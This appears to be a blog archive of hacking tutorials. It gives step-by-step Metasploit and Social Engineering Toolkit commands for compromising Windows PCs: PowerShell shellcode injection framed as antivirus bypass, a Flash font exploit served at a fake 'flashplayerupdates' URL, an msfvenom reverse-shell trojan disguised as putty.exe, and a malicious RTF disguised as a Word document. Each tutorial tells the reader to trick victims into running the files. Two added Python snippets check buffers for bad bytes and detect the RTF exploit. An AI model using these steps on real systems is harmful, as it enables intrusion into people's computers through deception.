Archive for August, 2012

Hack Windows 7 PC using the PowerShell Attack Vector in the Social Engineering Toolkit (Bypassing Antivirus)


The PowerShell Attack Vector module allows you to create PowerShell-specific attacks. These attacks use PowerShell, which is installed by default on Windows 7 and later (on Windows Vista it is an optional download). PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by preventative technologies such as signature-based antivirus: the script runs in memory from a command line and never has to be written to disk as an executable. Keep in mind that the command line itself, with its encoded script and its VirtualAlloc/CreateThread P/Invoke pattern, is exactly what process-creation logging and later defenses such as PowerShell script block logging are built to catch.

  • Powershell Alphanumeric Shellcode Injector
  • Powershell Reverse Shell
  • Powershell Bind Shell
  • Powershell Dump SAM Database

Open your BackTrack terminal and type cd /pentest/exploits/set

Now open the Social Engineering Toolkit (SET): ./set

Now choose 1, “Social-Engineering Attacks”

Now choose 10, “Powershell Attack Vector”

Now choose 1, “Powershell Alphanumeric Shellcode Injector”, and type the IP address of your PC for the reverse connection.

Now create the exploit code for 32-bit and 64-bit Windows:

Now retrieve the PowerShell code that SET created. The 64-bit version is saved in /pentest/exploits/set/reports/powershell/x64_powershell_injection.txt, with the 32-bit version alongside it. Each file holds a single powershell.exe command line whose script is passed as a base64 -EncodedCommand argument, which is why nothing has to be dropped on the target's disk.

Now send x64_powershell_injection.txt to the victim via chat, email or any other social engineering technique, and convince the victim to open it and paste its contents into a Windows 7 command prompt (use the x86 file if the target runs 32-bit Windows, since the 64-bit shellcode will crash a 32-bit PowerShell).

Now you have access to the victim's PC. Type sessions -l to list the sessions and sessions -i ID (with the session number) to interact with one.

Attacking a Remote PC using Adobe Flash Player 11.3 Font Parsing Code Execution


This module exploits a vulnerability (CVE-2012-1535) found in the ActiveX component of Adobe Flash Player before 11.3.300.271. By supplying a corrupt OTF font file that the served SWF loads, it is possible to gain arbitrary remote code execution in the context of the browser user, as exploited in the wild. The victim has to browse to the exploit URL with Internet Explorer and a vulnerable Flash ActiveX control installed; the resulting session runs with that user's privileges, not SYSTEM.

Exploit Targets

Adobe Flash Player before 11.3.300.271.

Internet Explorer 6 on XP SP2

Internet Explorer 7 on XP SP2

Internet Explorer 8 on XP SP2

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP SP 2

Open a BackTrack terminal and type msfconsole

Now type use exploit/windows/browser/adobe_flash_otf_font

msf exploit(adobe_flash_otf_font) > set payload windows/meterpreter/reverse_tcp

msf exploit(adobe_flash_otf_font) > set lhost 192.168.1.4 (IP of the local host, where the reverse shell connects back)

msf exploit(adobe_flash_otf_font) > set srvhost 192.168.1.4 (the address the exploit web server listens on; this must be an address on the local machine)

msf exploit(adobe_flash_otf_font) > set uripath flashplayerupdates (the URL path to use for this exploit; a random path is generated if you leave it unset)

msf exploit(adobe_flash_otf_font) > exploit

The exploit server now listens on the default SRVPORT 8080, so the URL to give your victim is http://192.168.1.4:8080/flashplayerupdates

Send the link to the victim via chat, email or any other social engineering technique. When a vulnerable browser loads the page, the SWF is served and the payload connects back to the handler that the module started.

Now you have access to the victim's PC. Type sessions -l to list the sessions and sessions -i ID (with the session number) to interact with one.

Hack Remote Windows 7 PC Easy Way (Msfvenom Tutorial)


Msfvenom is a combination of msfpayload and msfencode, putting both of these tools into a single framework instance. The advantages of msfvenom are:

  • One single tool
  • Standardized command line options
  • Increased speed

Open your terminal and type msfvenom -h; msfvenom has a wide range of options available.

Now type

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.3 LPORT=4444 -f exe > putty.exe

-p the payload to use: windows/meterpreter/reverse_tcp
-e the encoder to use: x86/shikata_ga_nai
LHOST=192.168.1.3 the IP address of your local host (the attacker machine the payload connects back to)
LPORT=4444 the port your handler listens on
-i 5 run the encoder 5 times (iterations)
-b '\x00' bad characters that the encoded payload must not contain (here the null byte)
-f exe the output format (a Windows executable)

Note that -e and -b exist to remove bad characters from exploit buffers; repeated shikata_ga_nai passes are not a reliable antivirus bypass, because the default exe template msfvenom wraps the payload in is widely signatured.

We have now generated the malicious exe file. The shell redirect writes it to the directory you ran the command from, here

/root/putty.exe
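The bad-character option above is easiest to understand by checking a buffer for the bytes it must not contain. The Python below is an added example, not part of the original post or of msfvenom: it parses the msfvenom -b syntax, scans a buffer for the forbidden bytes and reports their offsets, and it can be pointed at a file produced with -f raw. The two sample byte strings are constructed x86 fragments (mov eax,0 / push eax versus the null-free xor eax,eax / push eax), not msfvenom output; the file path in check_raw_payload is an assumption.

```python
import re

# Constructed sample fragments (x86 machine code), not msfvenom output: the first sets
# EAX to zero with "mov eax, 0" (b8 00 00 00 00) and pushes it; the second does the same
# job with "xor eax, eax" (31 c0), which is how an encoder or hand-written shellcode
# keeps null bytes out of a buffer that a string copy would truncate.
RAW_WITH_NULLS = b"\xb8\x00\x00\x00\x00\x50"
NULL_FREE = b"\x31\xc0\x50"


def parse_badchars(spec):
    """Parse the msfvenom -b syntax ("\\x00\\x0a\\x0d") into bytes; rejects any other form."""
    if not re.fullmatch(r"(\\x[0-9a-fA-F]{2})*", spec):
        raise ValueError("bad character list must be \\xNN sequences: %r" % spec)
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", spec))


def find_bad_chars(blob, bad):
    """Map each forbidden byte that occurs in blob to the list of offsets where it appears."""
    hits = {}
    for offset, value in enumerate(blob):
        if value in bad:
            hits.setdefault(value, []).append(offset)
    return hits


def report(blob, bad):
    """Human-readable summary; an empty result from find_bad_chars means the buffer is clean."""
    hits = find_bad_chars(blob, bad)
    if not hits:
        return "clean: %d bytes, none of %s present" % (len(blob), bad.hex())
    return "; ".join("\\x%02x at %s" % (b, offs) for b, offs in sorted(hits.items()))


def check_raw_payload(path, spec="\\x00"):
    """Check a file produced with 'msfvenom ... -f raw > shellcode.bin' (assumed path)."""
    with open(path, "rb") as fh:
        return find_bad_chars(fh.read(), parse_badchars(spec))


if __name__ == "__main__":
    bad = parse_badchars("\\x00")
    print(report(RAW_WITH_NULLS, bad))   # nulls at offsets 1-4
    print(report(NULL_FREE, bad))        # clean
```

When you build a payload for a real exploit buffer, run the raw output through find_bad_chars with the exploit's full bad-character list before trusting it; an encoder that reports success but whose decoder stub contains a forbidden byte still breaks the exploit.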

Now open your BackTrack terminal and type msfconsole

Now we need to set up a listener to handle the reverse connection the victim sends when the payload runs. The handler's payload, LHOST and LPORT must match what was given to msfvenom (LPORT defaults to 4444, which is why it is not set here).

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.3

exploit

Now send putty.exe to the victim. As soon as they download and run it, you get a meterpreter session on the victim's computer. The file is named putty.exe only to look plausible; it is not PuTTY and shows the user nothing when run.


Hack Remote Windows PC using Microsoft Office word MS12-027 MSCOMCTL ActiveX Buffer Overflow


This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF file to embed a specially crafted MSComctlLib.ListViewCtrl.2 control, as exploited in the wild in April 2012. The module targets Office 2007 and Office 2010. The DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses msgr3en.dll, which is only loaded after Office itself has finished loading, so for that target the malicious file must be opened through File / Open rather than by double-clicking it.

Exploit Targets

MS Office 2007 on Windows XP SP2 / SP3

MS Office 2010 on Windows 7 / Windows 7 SP1

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open a BackTrack terminal and type msfconsole

Now type use exploit/windows/fileformat/ms12_027_mscomctl_bof

msf exploit(ms12_027_mscomctl_bof) > set payload windows/meterpreter/reverse_tcp

msf exploit(ms12_027_mscomctl_bof) > set lhost 192.168.1.3 (IP of the local host)

msf exploit(ms12_027_mscomctl_bof) > exploit

After the module generates the malicious document, it is stored on your local computer at

/root/.msf4/local/msf.doc

The content is RTF even though the extension is .doc; Word opens it by content, so the name is only there to look like an ordinary Word document.

Now we need to set up a listener to handle the reverse connection the victim sends when the exploit runs. The payload and LHOST must match the values used when the file was generated.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.3

exploit

Now send msf.doc to the victim. As soon as they download and open it (through File / Open for the Office 2010 target), you get a meterpreter session on the victim's computer.
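On the defensive side, the useful thing to know about this file is how the embedded control is named on disk, because that is what a mail gateway or an incident responder scans for. The Python below is an added example, not part of the original post or of the Metasploit module: it walks the RTF for \objclass groups naming MSComctlLib.ListViewCtrl.2 and decodes the hex-encoded OLE streams in \objdata groups, looking for the ProgID in ASCII and for the control's CLSID in the little-endian GUID layout used on disk. The CLSID is the public value for ListViewCtrl.2 from the MS12-027 advisory; the sample RTF is constructed for the demo and is not an exploit document.

```python
import re
import uuid

# ProgID and CLSID of MSComctlLib.ListViewCtrl.2, the control the MS12-027 module embeds
# (public values from the MS12-027 advisory; they are how the object is named inside the file).
LISTVIEW_PROGID = "MSComctlLib.ListViewCtrl.2"
LISTVIEW_CLSID = uuid.UUID("BDD1F04B-858B-11D1-B16A-00C0F0283628")

_OBJCLASS = re.compile(r"\\objclass\s+([A-Za-z0-9_.]+)")
_OBJDATA = re.compile(r"\\objdata\s*([0-9A-Fa-f\s]+)")


def objdata_blobs(text):
    """Yield the binary OLE streams that RTF carries hex-encoded inside \\objdata groups."""
    for m in _OBJDATA.finditer(text):
        hexstr = re.sub(r"\s+", "", m.group(1))
        yield bytes.fromhex(hexstr[: len(hexstr) - len(hexstr) % 2])


def scan_rtf(rtf):
    """Return the findings for an RTF file (bytes) that embeds the ListView control."""
    text = rtf.decode("latin-1")            # RTF is 7-bit; latin-1 keeps every byte as one char
    findings = []
    for m in _OBJCLASS.finditer(text):
        if m.group(1).lower() == LISTVIEW_PROGID.lower():
            findings.append("\\objclass names " + LISTVIEW_PROGID)
    for i, blob in enumerate(objdata_blobs(text)):
        if LISTVIEW_PROGID.encode() in blob:
            findings.append("ProgID %s inside \\objdata #%d" % (LISTVIEW_PROGID, i))
        if LISTVIEW_CLSID.bytes_le in blob:   # bytes_le is the on-disk GUID byte order
            findings.append("CLSID %s inside \\objdata #%d" % (LISTVIEW_CLSID, i))
    return findings


def build_sample_rtf():
    """Constructed minimal RTF (not the module's output, not an exploit): one OLE object group
    whose hex stream carries the ProgID in ASCII and the CLSID in little-endian GUID layout."""
    stream = (b"\x01\x05\x00\x00"                        # placeholder header bytes
              + LISTVIEW_PROGID.encode() + b"\x00"
              + LISTVIEW_CLSID.bytes_le
              + b"\x00" * 16)                            # filler standing in for control data
    return (b"{\\rtf1{\\object\\objocx{\\*\\objclass " + LISTVIEW_PROGID.encode() + b"}"
            b"{\\*\\objdata " + stream.hex().encode() + b"}}}")


if __name__ == "__main__":
    for line in scan_rtf(build_sample_rtf()):
        print(line)
```

Checking both the \objclass text and the decoded \objdata bytes matters because an attacker controls the RTF and can omit or mangle the \objclass group while Word still instantiates the control from the CLSID in the stream; the decoded bytes are the harder signal to hide.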
